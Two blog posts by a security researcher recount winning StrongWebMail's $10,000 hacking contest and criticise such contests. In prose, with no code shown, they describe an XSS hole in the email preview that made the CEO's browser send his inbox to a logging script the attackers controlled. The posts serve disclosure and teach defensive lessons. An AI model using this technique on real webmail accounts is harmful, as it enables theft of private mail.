Strongwebmail Contest Won

StrongWebMail announced yesterday that we officially won their $10k contest. Surprisingly, they don't appear to have learned from this last round of bad publicity and intend to launch another contest- once they've patched some holes and tightened the rules.

Assuming that the new rules aren't ridiculously restrictive, I'll probably participate in the next round- I've still got a few tricks up my sleeve. However, I must say I feel a bit dirty for feeding this publicity machine. These hacking contests, frankly, are a joke. If nobody gets in, marketing will hail their product as unbreakable. If somebody does get in, they call foul for breaking the rules. While some structure is necessary for any organized contest, the whole point of hacking is finding ways to bend rules and manipulate the system.

StrongWebMail's press release said "It is important to note that the frontend protection offered by StrongWebmail.com was not compromised. In fact, Lance and his team were forced to find a way around the phone authentication." That's not entirely true- we simply took the easiest route. With the webmail app riddled with holes, we saw no point in bothering with the front end. Considering it took us less than a minute from registration to find the hole we used to compromise the app, can you blame us?

I understand that StrongWebMail was created to demonstrate Telesign's 2-factor authentication system, but this is a perfect demonstration that security needs to be addressed holistically. When you claim to have "The Most Secure Email Accounts on the Planet", nobody cares that it's the third party app that is vulnerable- they care about the fact that the email accounts are indeed vulnerable.

The exploit that we used to break in involved an XSS hole in the email preview feature. We sent a message to the CEO's email account, and when viewed, his web browser made several AJAX requests to the server, slurping the contents of his inbox and then depositing it on a logging script under our control. Lance did an interview in which he discussed the details of the exploit further, and I recommend you read that for more details.

Finally, I want to give another big thanks to Lance James and Aviv Raff for working on this with me. Not only was it very fun, but it made some very good points (that will likely be forgotten soon) about web application security: Escape outputs, be careful with what third-party software you use, and don't taunt the hackers.

The StrongWebMail Incident

In case you've been living under a rock, Lance James, Aviv Raff, and I took up StrongWebMail's challenge to break into their CEO's webmail and claim a $10,000 prize. The terms of the contest preclude us from disclosing the details of the exploit, and while they've partially patched the holes that caused it, I'm not sure we're ever going to be allowed to tell the whole story.

Rest assured, we will openly disclose as much as we can, as soon as we can. In fact, I already have a blog post written and ready to go live. It will be published early next week at the latest, so stay tuned.

The current status: StrongWebMail's CEO confirmed that we exploited the application. They still have not confirmed that we won the prize, and are checking to make sure we complied with the contest rules. I'm confident we did. They gave themselves 3 business days (from yesterday, when we submitted the golden ticket) to confirm the win.

A few news reports about the incident implied that we may not qualify because social engineering is off limits. I can't make comments regarding the extent to which we used social engineering, but the rules say nothing about it- only that "working with an employee of StrongWebmail.com or one of its affiliates or partners to complete the hack" is not allowed.